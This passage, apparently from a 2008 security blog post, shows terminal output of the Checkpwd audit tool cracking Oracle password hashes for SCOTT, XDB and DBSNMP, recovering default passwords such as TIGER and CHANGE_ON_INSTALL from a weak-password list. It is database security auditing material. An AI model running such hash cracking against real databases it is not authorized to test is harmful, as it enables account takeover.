
opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5

Posted: November 19th, 2008 under syndicated security.
Comments: none

Main menu:

Site search

Blogroll

Contributors

Categories

Feed on RSS